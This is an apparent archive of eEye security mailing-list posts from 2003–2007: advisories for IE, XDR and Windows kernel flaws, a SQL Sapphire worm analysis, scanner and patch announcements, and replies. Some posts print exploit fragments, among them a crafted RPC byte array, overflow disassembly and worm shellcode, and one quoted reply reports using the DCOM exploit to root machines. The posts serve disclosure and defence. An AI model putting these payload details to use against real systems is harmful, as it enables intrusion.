RE: Skype Network Remote DoS Exploit

2007-08-20 Thread Marc Maiffret
Apologies if someone already posted the obvious question but:

How come this Patch Tuesday was different for Skype? 

Why didn't the last Patch Tuesday, which had the same rebooting
requirements as any other Patch Tuesday, cause the same problem with
Skype? What was different about this Patch Tuesday? Anyone seen Skype
give an explanation of that yet, as I'm assuming someone already asked
that question, hopefully.


> -Original Message-
> From: Steven M. Christey [mailto:[EMAIL PROTECTED] 
> Sent: Monday, August 20, 2007 10:39 AM
> Subject: Re: Skype Network Remote DoS Exploit
> The outage being experienced by Skype was apparently due to 
> massive simultaneous reboots and reconnects after systems 
> installed their Windows patches.
> from 
>The disruption was triggered by a massive restart of our users'
>computers across the globe within a very short timeframe as they
>re-booted after receiving a routine set of patches through Windows
>The high number of restarts affected Skype's network resources.
>This caused a flood of log-in requests, which, combined with the
>lack of peer-to-peer network resources, prompted a chain reaction
>that had a critical impact.
> I wonder how many other services are impacted by simultaneous 
> Windows scheduled updates.
> Anyway... given that this was going on at the time the 
> exploit was released, and the exploit only 
> claims a DoS (and only seems to make a series of requests to 
> long URIs), was the exploit actually effective, or was the 
> "DoS" just part of the larger outage?
> - Steve

ANI Zeroday, Third Party Patch

2007-03-30 Thread Marc Maiffret
A new vulnerability was recently discovered, in the wild, that affects
the .ANI file format. This flaw affects all versions of Microsoft
Windows and can be delivered through multiple attack vectors,
specifically any user who visits a malicious website. This flaw remains
as of yet unpatched by Microsoft.

Interesting to point out is the similarity between this new zeroday and
a .ANI file vulnerability that eEye discovered as far back as 2005. It
seems even though Microsoft takes on average over 6 months to produce
patches they still are failing in being able to perform a proper code
audit to find similar and related vulnerabilities. This is made more
apparent by the fact that this vulnerable code also ships with Windows

We have provided a brief analysis, free third party patch (with source
code), which is all available here:

This patch like ones we have done previously has full command line
options, for scripting and related, and also source code is included for
your learning/verification etc...

As always patches like this are experimental, i.e. we are not Microsoft,
however we have taken as many precautions as we can to make the patch as
stable as possible. Alternatively we also provide a complete, free host
based security solution which will protect from this attack and many
others, which you can download here:

Any questions, comments, improvements, please direct them to

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9329 - End-Point Vulnerability Prevention - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities 

EEYE: Internet Explorer Compressed Content URL Heap Overflow Vulnerability

2006-08-24 Thread Marc Maiffret
Internet Explorer Compressed Content URL Heap Overflow Vulnerability

Release Date:
August 24, 2006

Date Reported:
August 17, 2006

High (Code Execution)

Systems Affected:
Internet Explorer 6 SP1 with MS06-042 - Windows 2000
Internet Explorer 6 SP1 with MS06-042 - Windows XP SP1

eEye Digital Security has discovered a heap overflow vulnerability in
the MS06-042 cumulative Internet Explorer update that would allow an
attacker to execute arbitrary code on the system of a victim who
attempts to access a malicious URL. Only Windows 2000 and Windows XP SP1
systems running Internet Explorer 6 SP1 with the MS06-042 patch applied
are vulnerable.

The heap overflow occurs when URLMON.DLL attempts to handle a long URL
for which the web server's response indicated GZIP or deflate encoding.
This means that the user interaction requirement for this attack is
negligible, since clicking a hyperlink, visiting a malicious web page,
or even attempting to view an image for which the source is a malicious
URL, permits exploitation of the vulnerability.  Furthermore, the
attacker is not required to control a web server in order to serve up a
specially-crafted response, since any compressed response -- even an
error message -- is sufficient to cause the overflow, regardless of its

Technical Details:
URLMON.DLL version 6.0.2800.1565, distributed with the MS06-042 patch
for Internet Explorer 6 SP1 on Windows 2000 and Windows XP SP1, contains
a heap buffer overflow vulnerability due to an incongruous use of
lstrcpynA.  CMimeFt::Create allocates a 390h-byte heap block for a new
instance of the CMimeFt class, within which there is a 104h
(MAX_PATH)-byte ASCII string buffer at offset +160h:

1A4268DDpush390h; cb
1A4268E2call[EMAIL PROTECTED]@Z; operator new(uint)

When an access to a URL elicits a GZIP- or deflate-encoded response from
the web server, CMimeFt::Start will attempt to copy the URL into the
104h-byte string buffer using the lstrcpynA API function, but it passes
a maximum length argument of 824h (2084 decimal), a value typically used
as the maximum length of a URL:

1A426199push824h; iMaxLength
1A42619Epusheax ; lpString2
1A42619Fadd esi, 160h
1A4261A5pushesi ; lpString1

As a result, fields within the CMimeFt class instance as well as the
contents of adjacent heap blocks can be overwritten with
attacker-supplied data from the malicious URL.

URLMON.DLL in the MS06-042 patch for Internet Explorer 5 uses MAX_PATH
both as the buffer size and as the maximum copy length, while URLMON.DLL
in the patch for Windows XP SP2 and Windows 2003 uses 824h in both

This issue was originally documented as an Internet Explorer crash in
Microsoft Knowledge Base Article KB923762
(; Revision 2.0 as of August
21st), in response to numerous reports of conflicts between the MS06-042
patch and various HTTP-based software products, dating back to at least
August 11th. eEye independently discovered the flaw on August 15th and
subsequently reported it to Microsoft on the 17th.

Retina Network Security Scanner has been updated to identify this
Blink Endpoint Vulnerability Prevention preemptively protects from this

Vendor Status:
Microsoft has released a new version of the MS06-042 patch to correct
this vulnerability. The revised patch is available at:

Note that installing the original release of the MS06-042 update causes
a system to become vulnerable, so the version 2.0 release of the
MS06-042 patch will need to be applied in order to secure that system.

Systems with the hotfix described in Microsoft Knowledge Base Article
KB923762 ( applied are not
susceptible to this vulnerability, although the MS06-042 v2.0 patch
should still be installed on these systems.

Derek Soeder

Related Links:
Retina Network Security Scanner - Free Trial
Blink Endpoint Vulnerability Prevention - Free Trial

Unexpected exits.

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use

EEYE:ALERT: MS06-042 Related Internet Explorer 'Crash' is Exploitable

2006-08-22 Thread Marc Maiffret
MS06-042 Related Internet Explorer 'Crash' is Exploitable

August 22, 2006


Systems Affected:
Windows 2000 with IE6 SP1 and MS06-042 hotfix installed
Windows XP SP1 with IE6 SP1 and MS06-042 hotfix installed

On August 8th Microsoft released MS06-042 which was a cumulative update
for Internet Explorer[1]. Over the course of a few days after the
release of this patch various Internet Explorer users and businesses
started to experience Internet Explorer crashing problems when viewing
certain websites[2]. Later on August 11th Microsoft created a knowledge
base article which talked about problems with the MS06-042 patch and how
Internet Explorer could crash when viewing some web pages that used
compression[3]. This Microsoft KB article referenced a patch, which
could be requested through Microsoft Product Support Services, that
would fix the "crashing" bug. There was further discussion about the
extent of the crashes and widespread nature of the bug on places such as
SANS and various patch and IT mailing lists[4]. Because of the
widespread discussions and number of people experiencing the Internet
Explorer crash various security researchers, including eEye, decided to
investigate as a lot of times crashes can be exploitable. 

We have since found that indeed the reason that people are experiencing
Internet Explorer browser crashes is certain websites, that use
compression (as stated by Microsoft[5]), are causing a non-malicious
buffer overflow to occur within Internet Explorer. After investigating
and confirming that indeed this is an exploitable condition we are
alerting people to the true severity of these "crashing" problems that
people are experiencing, so that they can take the appropriate
mitigation steps as need be. 

This information is already known in various research circles and also
with exploit writers. So it is important that IT administrators
understand the true threat of this problem that this is not simply a
crashing bug, as Microsoft has been incorrectly misrepresenting it, but
in fact that it is an exploitable security bug. Researchers and exploit
developers know this, therefore it is extremely important that IT
administrators are told what really is going on.

Windows 2000 IE6 SP1 Systems
Patch: Microsoft created and released a non-public patch on August 11th.
You can find out more about this patch here: This patch can only currently
be obtained through the Microsoft PSS process. However, Microsoft does
plan to eventually release a public patch through Windows Update etc...
Workaround: Disable HTTP1.1 functionality as outlined by Microsoft in
their knowledge base article:
Please review the caveats of doing this as outlined by Microsoft.

Windows XP SP1 IE6 SP1 Systems
Patch: The best way to protect your XP systems is to upgrade to Windows
XP SP2 as it is protected against this vulnerability. Also support for
XP SP1 ends in October and there are huge security benefits to XP SP2 so
hopefully your're already migrated to it. If you are not however and you
are stuck on XP SP1 then you can use the Microsoft Knowledge base patch
which was released on August 11th through the PSS process.
Workaround: Disable HTTP1.1 functionality as outlined by Microsoft in
their knowledge base article:
Please review the caveats of doing this as outlined by Microsoft.

Credit: Derek Soeder (eEye)

[1] - MS06-042 Bulletin -
[2] - SANS -
[3] - Microsoft KB Article -
[4] - SANS Thread -
[5] -

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

RE: Mailslot bug (MS06-035) vs non-Mailslot bug (CVE-2006-3942)

2006-08-18 Thread Marc Maiffret
> -Original Message-
> From: Gerardo Richarte [mailto:[EMAIL PROTECTED] 
>  non-Mailslot bug(MS0?-???/CVE-2006-3942)

> "Vulnerability details" section to find what I expected: 
> NOTHING. Just a general description, as in most advisories 
> lately, which can't, in any way, be used to prove or disprove 
> the existence of the bug, nor to decide how high in the 
> priority list this patch should be put:

> . Advisories with almost no technical details are bad: They do not
>provide enough information to let users decide how serious the
>condition is in their specific situation, quite often lead to the
>accidental discovery of new bugs (this is not the first 
> time I've seen

>pretty much your only choice... Unless somebody comes out 
> with a home
>made patch for SRV.SYS. I haven't checked, but I wouldn't 
> be surprised

Bravo sir. It is always nice to see another company, or even
researcher[s] for that matter, releasing *useful* details on bugs. How
many more binary diffing videos (ours included) do
vendors/researchers/securitycompanies have to see before everyone can
simply agree that by virtue of having the patch you will find the
vulnerabilities that everyone is so afraid to talk about. 

When vendors do not give the correct level of details they leave
everyone in the dark and everyone guessing. So you have things like this
unpatched DoS being discovered, and nothing but confusion for
customers/researchers trying to determine the true risk related to these
flaws. That is why people thought for a while that the DoS was actually
the mailslot bug, and they didn't have any technical details to turn to,
to help them realize that it really was a different bug... So then even
eventually exploits were publicly released for what was then realized to
be an unpatched flaw etc...

It makes matters worse when you find multiple silently fixed
vulnerabilities within a patch and sometimes they have different
dependencies for exploitation such as what features are enabled, service
pack levels, etc... And then your wondering which of the bugs to
correlate to the vendors description of the risk and mitigating factors
and everything else.

And we go through this pain, headache, and annoyance for what reason?
Because of some make believe fear that maybe there might be an exploit
released in 3 hours instead of the typical 4 hours it takes the guys at
places like Core, Immunity, Metasploit, to produce an exploit after a
patch Tuesday or related announcement. 

It does not really make any sense... Except for when you look at who
are, "those other people", finding vulnerabilities and releasing
worthless "me too" zero detail advisories. They are the companies ran by
ignorant cowards who are afraid of thinking about security from a
scientific and academic perspective but instead from the perspective of
never wanting to risk rocking the boat for sake of corporate image
because the ignorant masses might portray them as doing the wrong thing.
It seems systemic though across most things these days that people cant
seem to find the will power to do what they know is right, even if the
masses might not yet understand.

So keep on truckin Core Security, Michal Zalewski, and even
Tippingpoint/iDefense. R.I.P. l0pht, RAZOR, @stake.

P.S. Since Gera mentioned about someone coming out with a homemade patch
for this DoS since we are all still waiting around for MS to act... You
can download such a patch from, it is in the
current blog post, courtesy of Derek Soeder. It is obviously
experimental and we recommend checking it out from a research
perspective rather than it being something like our previous third party
patch which was fine to install wherever.

Marc Maiffret
Chief Hacking Officer
Founder / CTO
eEye Digital Security
F.949.900.4111 - End-Point Vulnerability Prevention - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities 


2006-08-02 Thread Marc Maiffret

I am happy to announce to the first incarnation of On this site you can find everything from our
previously released advisories to our previously unreleased research
tools. A lot of these tools are seeing daylight for the first time
outside of eEye so we do expect there to be bugs we have not noticed
before. We definitely encourage your feedback. You can provide such
feedback directly to research via [EMAIL PROTECTED]

Besides the new site, which will continue to be updated, we are also
releasing a few new tools today:

eEye Binary Diffing Suite
You can probably guess what this is... It is a new set of free tools we
are releasing that can be used to perform binary differential analysis.
This is obviously very useful in doing patch reverse engineering and
related tasks. There are still some bugs to be worked out so expect some
more updates over time not only in bug fixes but also as we expand its
capabilities as far as function matching etc... We have released this as
open source so feel free to send email feedback or questions, and if you
so chose, improvements.

Duster is the Dead/Uninitialized Stack Eraser, an injectable DLL that
causes uninitialized stack and heap memory in its host process to be
wiped over with a specific value. It is intended as a crude tool to
assist in the run-time discovery of uninitialized memory usage problems
by increasing the chances that the host process will raise an exception
when a value in uninitialized memory is used. The Duster DLL activates
automatically upon being loaded into a process. Windows NT
4.0/2000/XP/2003 only.

We also have done some updates to some classics including BootRoot with
the release of the SysRQ.iso so you can subvert the Windows kernel as it
loads and spawn a nice SYSTEM command prompt, equally useful for system
administrators who forget their password etc... We also have posted the
presentation for PiXiE which is a proof-of-concept network boot virus,
for those of you moving to thin clients, you might want to double check
the security of said systems.

And there is of course "the blog" with which we finally have joined the
masses of teenagers and security researchers alike who want to tell you
about every waking moment of their lives. Ours should be a repetitive
mix of 0day, Tequila and of course as you would expect, security rap

Lastly while speaking of blogging I am sure there will be some
interesting things to "blog about" at this years Blackhat in Vegas.

We hope to see all of you out there, and for those that can not make it,
see you next Tuesday!

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9329 - End-Point Vulnerability Prevention - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities 

EEYE: Temporary workaround for IE createTextRange vulnerability

2006-03-28 Thread Marc Maiffret
eEye Digital Security has created a temporary work around for the
current Internet Explorer zero day vulnerability within the IE
createTextRange functionality. 

This workaround has been created because currently there is no solution
from Microsoft other than the workaround to disable Active Scripting. We
have personally had requests from various customers and the community to
help provide a free solution in the case that companies and users are
not able to disable Active Scripting. The workaround we have created,
like ones before it, is experimental in a sense and should only be
installed if you are not able to use the safer mitigation of disabling
Active Scripting. 

The workaround is obviously free, and we do not require any registration
information to download it from the eEye website. 

Should you encounter any problems with the workaround or bugs please
send email to [EMAIL PROTECTED] with detailed information on the problem
you experienced and we will work to fix any bugs in a timely fashion. We
will post updates to the website with version numbers and bug fixes
should they arise.

Obviously these things are experimental in nature but considering the
options of being vulnerable or at least having a fighting chance... Well
I think you get the point. Again this is just another mitigation option
until Microsoft releases their patch, which last was scheduled for April
11th or 16 days from now. 

For more information on the vulnerability and a link to download the
workaround please visit:

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9329 - End-Point Vulnerability Prevention - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities 

RE: [Full-disclosure] [EEYEB-20050523] Windows Kernel APC Data-FreeLocal Privilege Escalation Vulnerability

2005-12-14 Thread Marc Maiffret
To be clear we did not make any claim except that Retina has been
updated to be able to identify this vulnerability. Obviously being that
it is a local vulnerability we audit for the vulnerability using
credentials through normal means that you should find in most any
vulnerability assessment scanner.


> -Original Message-
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Joshua Russel
> Sent: Tuesday, December 13, 2005 10:28 AM
> To: Advisories
> Cc:; 
> Subject: Re: [Full-disclosure] [EEYEB-20050523] Windows 
> Kernel APC Data-FreeLocal Privilege Escalation Vulnerability
> It is a local vulnerability, then how does Retina claims to 
> scan it remotely?
> On 12/13/05, Advisories <[EMAIL PROTECTED]> wrote:
> > Windows Kernel APC Data-Free Local Privilege Escalation 
> Vulnerability
> >
> > Release Date:
> > December 13, 2005
> >
> > Date Reported:
> > May 23, 2005
> >
> > External Refferences:
> > eEye ID# EEYEB-20050523
> > OSVDB ID# 18823
> > CVE # CAN-2005-2827
> > Microsoft #  MS05-055
> >
> > Severity:
> > Medium (Local Privilege Escalation to Kernel)
> >
> > Systems Affected:
> > Windows NT 4.0
> > Windows 2000
> >
> > Overview:
> > eEye Digital Security has discovered a local privilege escalation 
> > vulnerability in the Windows kernel that could allow any code 
> > executing on a Windows NT 4.0 or Windows 2000 system to 
> elevate itself 
> > to the highest possible local privilege level (kernel).  
> For example, 
> > a malicious user, network worm, or e-mail virus could take 
> advantage 
> > of this vulnerability in order to completely compromise the 
> vulnerable 
> > system on which the exploit code is executing, regardless of that 
> > code's original privilege level.
> >
> > The vulnerability exists in the thread termination routine 
> contained 
> > within NTOSKRNL.EXE.  Through a specific series of steps, a local 
> > attacker can cause the code responsible for discarding queued 
> > Asynchronous Procedure Call (APC) entries to erroneously attempt to 
> > free a region of kernel data, producing a "data free" vulnerability 
> > that may be exploited in order to alter arbitrary kernel memory, or 
> > even divert the flow of execution directly.
> >
> > Technical Details:
> > The basis of this vulnerability is in PspExitThread's APC 
> freeing loop 
> > and in the behavior of KiMoveApcState, invoked from KiAttachProcess 
> > and KeUnstackDetachProcess.  We'll give a description of 
> the problem 
> > below, followed by a "call flow" illustration to outline 
> the specific 
> > sequence of events.
> >
> > When a thread is exiting, PspExitThread will detach the 
> thread's APC 
> > queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so 
> > that each queue is now a circular, doubly-linked list in which the 
> > first and last nodes do not point back to the list head 
> (LIST_ENTRY structure).
> > However, since the list heads' pointers are not modified, 
> the purpose 
> > is presumably just to allow the APC freeing loop within 
> PspExitThread 
> > to walk each list and free its nodes, without navigating 
> back to the 
> > list head and erroneously attempting to free memory within 
> the ETHREAD 
> > structure.  Of course, the vulnerability is that this can 
> be made to 
> > happen, and the result is a "data free" condition that eventually 
> > causes ExFreePoolWithTag to operate on user memory.
> >
> > APCs queued by an external process count against that 
> process's pool 
> > quota, and therefore the quota block of the pool block 
> containing the 
> > APC structure has a reference to the queuing process.  If 
> the exiting 
> > thread contains an APC queued by a now-terminated external 
> process in 
> > its lists, and if that APC node represents the last 
> reference to the 
> > process's Process object, then freeing that node will cause the 
> > Process object to be destroyed from within 
> ExFreePoolWithTag.  Part of 
> > this sequence involves executing PspProcessDelete, which 
> switches to 
> > the ending process's address space using 
> KeStackAttachProcess, calls 
> > PspExitProcess, and then reverses the switch with 
> > KeUnstackDetachProcess.
> >
> > Both the "attach" and "detach" functions call 
> KiMoveApcState, which is 
> > intended to temporarily strip the thread of its APCs so 
> that none are 
> > dispatched in an address space for which they were not 
> intended, then 
> > re-link the list of APCs after the thread's native address space is 
> > reinstated.  During attach, the ETHREAD.ApcState structure is 
> > duplicated, and the pointers of the lists' first and last nodes are 
> > adjusted to refer to the copy.  Upon detach, the first and 
> last nodes'
> > pointers are adjusted to re-link the lists to the original 
> > ETHREAD.ApcState -- even though they were supposed to remain 
> > disconnected, since the A

RE: DCOM RPC exploit (dcom.c)

2003-07-29 Thread Marc Maiffret
We just updated the tool a few minutes ago and fixed some bugs that should
clear up any left over inaccuracies. Also fixed a bug keeping NT 4.0
detection from working correctly. If you find any bugs please let us know.

RPC/DCOM Scanner 1.0.3

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

| -Original Message-
| From: S G Masood [mailto:[EMAIL PROTECTED]
| Sent: Saturday, July 26, 2003 7:53 PM
| Subject: Re: DCOM RPC exploit (dcom.c)
| Hello list,
| The Dcom.c compiles neatly on Cygwin with GCC 3.2 when
| the "#include " line is removed.
| *Very* accurate. If the machine is vulnerable, the
| exploit will almost always succeed on the first
| attempt.
| I've successfully tested it on about 16 boxes and each
| one was rooted on the first try. Among these were
| Win2k with SP0, SP1, SP3 while two were WinXP(SP level
| not known). Before running the exploit, the machines
| were confirmed as vulnerable with the Eeye tool(on a
| side note, while the Eeye tool did recognise many
| vulnerable boxes, it failed to recognise some of them,
| though, they were vulnerable).
| One glitch is that the exploitation is not very
| stealth. All RPC/COM based functions stop working
| completely after exploitation and fail to heal until
| the machine is restarted. Many of these functions are
| quite visible and easily noticeable(drag&drop,
| clipboard, property sheets, etc., for example). This
| happens without exception.
| The exploit mostly times out when run against remote
| hosts.
| Hope we are all patched before Tim Mullen's
| "Mescaline"(
| becomes a reality.
| One last advice - think twice before doing any thing
| risky with the exploit. Though highly accurate, it is
| very noisy.
| Regards,
| S.G.Masood
| Hyderabad,
| India.
| __
| Do you Yahoo!?
| Yahoo! SiteBuilder - Free, easy-to-use web site design software

EEYE:ALERT Free RPC/DCOM vulnerability scanning tool

2003-07-26 Thread Marc Maiffret
Due to the recent release of multiple exploits for the very serious
Microsoft RPC/DCOM vulnerability
( we
have decided to release a free scanning tool that will allow
administrators to check to see if DCOM is enabled on remote machines,
and also if the remote system is vulnerable (patched or not). The
original vulnerability was discovered by the very talented researchers
at LSD. You definitely should read their advisory at: if you have not already.

This scanning tool does NOT require administrator access. There are
various commercial, and open source, scanners which check for this
vulnerability. However, those tools either require administrator access
(which will be non-existent at any large company with a large number of
IP's) or the tools will be intrusive in their testing and therefore
bring down servers. Our check does not require administrator access, nor
is our check intrusive in bringing down servers.

If you find any bugs in the tool please contact eEye Digital Security
via the email support option within the tool. Do not respond to this
eMail list as it is not the proper forum.

You can get the tool at:

P.S. Users of Retina (Network Security Scanner) have already had this
check within the latest Retina updates.

Marc Maiffret
Co-Founder/Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

RE: Alert: MS03-019, Microsoft... wrong, again.

2003-05-30 Thread Marc Maiffret
Microsoft is wrong and misleading customers in this advisory. This Windows
Media Service vulnerability is exploitable, as confirmed in the labs at
eEye, and by the discoverer of this vulnerability, Brett Moore.

I am not sure why Microsoft misidentified this vulnerability... maybe it is
just a typo, maybe its a lack of technical know-how. Either way they need to
re-release this advisory so that the correct information is given to

There is a big difference in telling customers "Ahh its a denial of service,
and your web server will automatically restart" compared to the reality of
the situation "If your running Windows Media Services on IIS, attackers can
spawn a remote shell 'command prompt' on your vulnerable system."

Brett Moore, the researcher that discovered this flaw, is going to be
releasing an advisory soon with more details on the how and why.

Not sure how you can have "Trust"worthy Computing when your misinforming
customers on a regular basis or releasing patches that disable their
Internet access. :-o

For those technically inclined... supposedly MS thinks controlling ecx and
eax on a mov [ecx],eax is not exploitable, just a DoS. hah

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

P.S. U.S. drinking team still rulez N.Z. >:-]

| -Original Message-
| From: Windows NTBugtraq Mailing List
| [mailto:[EMAIL PROTECTED] Behalf Of Russ
| Sent: Wednesday, May 28, 2003 10:30 AM
| Subject: Alert: Microsoft Security Bulletin - MS03-019
| Flaw in ISAPI Extension for Windows Media Services Could Cause
| Denial of Service (817772)
| Originally posted: May 28, 2003
| Summary
| Who should read this bulletin: System administrators running
| Microsoft® Windows NT 4.0 or Microsoft Windows 2000
| Impact of vulnerability: Denial of Service
| Maximum Severity Rating: Moderate
| Recommendation: System administrators install the patch at the
| earliest available opportunity.
| Affected Software:
| - Microsoft Windows NT 4.0
| - Microsoft Windows 2000Non Affected Software:
| -  Microsoft Windows XP
| -  Microsoft Windows Server 2003

EEYE: XDR Integer Overflow

2003-03-19 Thread Marc Maiffret
XDR Integer Overflow

Release Date:
March 19, 2003

High (Remote Code Execution/Denial of Service)

Systems Affected:

Sun Microsystems Network Services Library (libnsl)
BSD-derived libraries with XDR/RPC routines (libc)
GNU C library with sunrpc (glibc)


XDR is a standard for the description and encoding of data which is used
heavily in RPC implementations. Several libraries exist that allow a
developer to incorporate XDR into his or her applications. Vulnerabilities
were discovered in these libraries during the testing of new Retina auditing
technologies developed by the eEye research department.

ADAM and EVE are two technologies developed by eEye to remotely and locally
audit applications for the existence of common vulnerabilities. During an
ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR
library. By supplying specific integer values in length fields during an RPC
transaction, we were able to produce various overflow conditions in UNIX RPC

Technical Description:

The xdrmem_getbytes() function in the XDR library provided by Sun
Microsystems contains an integer overflow. Depending on the location and use
of the vulnerable xdrmem_getbytes() routine, various conditions may be
presented that can permit an attacker to remotely exploit a service using
this vulnerable routine.

For the purpose of signature development and further security research a
sample session is included below that replicates an integer overflow in the
rpcbind shipped with various versions of the Solaris operating system.

char evil_rpc[] =

"\xFF\xFF\xFF\xFF" // RPC argument length

Vendor Status:

Sun Microsystems was contacted on November 13, 2002 and CERT was contacted
shortly afterwards. Vendors believed to be vulnerable were contacted by CERT
during a grace period of several months. Due to some difficulties
communicating with vendors, after rescheduling several times a release date
was set for March 18, 2003.

eEye recommends obtaining the necessary patches or updates from vendors as
they become available after the release of this and the CERT advisory.

For a list of vendors and their responses, please review the CERT advisory

You can find the latest copy of this advisory, along with other eEye
research at

Riley Hassell - Senior Research Associate

Liver destroyers of the world:
Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn.

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

RE: SQL Sapphire Worm Analysis

2003-01-25 Thread Marc Maiffret
We updated that part of the advisory earlier this morning. The Corrective
Action part of the advisory did mention SP3 as the right patch. However
indeed at the top of the advisory SP2 was a mistake.

For the latest version and information on our sql worm analysis goto:

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

| -Original Message-
| From: trent dilkie [mailto:[EMAIL PROTECTED]]
| Sent: Saturday, January 25, 2003 1:49 PM
| To: 'Marc Maiffret'; 'BUGTRAQ'
| Subject: RE: SQL Sapphire Worm Analysis
| Actually, this effects SQL 2000 SP2 too, not just pre-SP2.
| To be safe from this exploit, you need to install SP2 AND MS02-039 or
| install SP3. Also, we had some problems with SQL 2000 SP3 in our
| testing, so
| we haven't rolled it out yet.
| Trent.
| -Original Message-----
| From: Marc Maiffret [mailto:[EMAIL PROTECTED]]
| Sent: Saturday, January 25, 2003 10:12 AM
| Subject: SQL Sapphire Worm Analysis
| SQL Sapphire Worm Analysis
| Release Date:
| 1/25/03
| Severity:
| High
| Systems Affected:
| Microsoft SQL Server 2000 pre SP 2
| Description:
| Late Friday, January 24, 2003 we became aware of a new SQL worm spreading
| quickly across various networks around the world.
| The worm is spreading using a buffer overflow to exploit a flaw
| in Microsoft
| SQL Server 2000. The SQL 2000 server flaw was  discovered in July, 2002 by
| Next Generation Security Software Ltd. The buffer overflow exists
| because of
| the way SQL  improperly handles data sent to its Microsoft SQL
| Monitor port.
| Attackers leveraging this vulnerability will be executing  their code as
| SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.
| The worm works by generating pseudo-random IP addresses to try to infect
| with its payload. The worm payload does not contain  any additional
| malicious content (in the form of backdoors etc.); however, because of the
| nature of the worm and the speed at  which it attempts to
| re-infect systems,
| it can potentially create a denial-of-service attack against infected
| networks.
| We have been able to verify that multiple points of connectivity on the
| Internet have been bogged down since 9pm Pacific  Standard Time.
| It should be noted that this worm is not the same as an earlier SQL worm
| that used the SA/nopassword SQL vulnerability as its  spread
| vector. This is
| a new worm is more devastating as it is taking advantage of a
| software-specific flaw rather than a  configuration error. We have already
| had many reports of smaller networks brought down due to the flood of data
| from the  Sapphire Worm trying to re-infect new systems.
| Corrective Action
| We recommend that people immediately firewall SQL service ports at all of
| their gateways. The worm uses only UDP port 1434  (SQL Monitor Port) to
| spread itself to a new system; however, it is safe practice to filter all
| SQL traffic at all gateways.  The following is a list of SQL server ports:
| ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s 1433/udp
| #Microsoft-SQL-Server ms-sql-m 1434/tcp #Microsoft-SQL-Monitor ms-sql-m
| 1434/udp #Microsoft-SQL-Monitor
| Once again this worm is taking advantage of a known vulnerability that has
| had a patch available for many months. Microsoft  has also
| released a recent
| service pack for SQL (Service Pack 3) that includes a fix for this
| vulnerability.
| Standalone patch:
| /security/
| bulletin/MS02-039.asp
| SQL 2000 Service Pack 3:
| Previous SQL Service Pack versions are vulnerable.
| Technical Description
| The following is a quick run-down of what the worm's payload is
| doing after
| infection:
| 1. Retrieves the address of GetProcAddress and Loadlibrary from the IAT in
| sqlsort.dll. It snags the necessary library base  addresses and function
| entry points as needed. 2. Calls gettickcount, and uses returned
| count as a
| pseudo-random seed 3. Creates a UDP socket 4. Performs a simple pseudo
| random number generation formula using the returned gettickcount value to
| generate an IP Address  that will later be used as the target. 5.
| Send worm
| payload in a SQL Server Resolution Service request to the pseudo random
| target address, on port 1434 (UDP). 6. Return back to formula and continue
| generating new pseudo random addresses.
| push42B0C9DCh   ; [RET] sqlsort.dll -> jmp esp
| mov eax, 1010101h   ; Reconstruct session, after the
| overflow the payload buffer
| ; get'

SQL Sapphire Worm Analysis

2003-01-25 Thread Marc Maiffret
SQL Sapphire Worm Analysis

Release Date:


Systems Affected:
Microsoft SQL Server 2000 pre SP 2

Late Friday, January 24, 2003 we became aware of a new SQL worm spreading
quickly across various networks around the world.

The worm is spreading using a buffer overflow to exploit a flaw in Microsoft
SQL Server 2000. The SQL 2000 server flaw was  discovered in July, 2002 by
Next Generation Security Software Ltd. The buffer overflow exists because of
the way SQL  improperly handles data sent to its Microsoft SQL Monitor port.
Attackers leveraging this vulnerability will be executing  their code as
SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.

The worm works by generating pseudo-random IP addresses to try to infect
with its payload. The worm payload does not contain  any additional
malicious content (in the form of backdoors etc.); however, because of the
nature of the worm and the speed at  which it attempts to re-infect systems,
it can potentially create a denial-of-service attack against infected

We have been able to verify that multiple points of connectivity on the
Internet have been bogged down since 9pm Pacific  Standard Time.

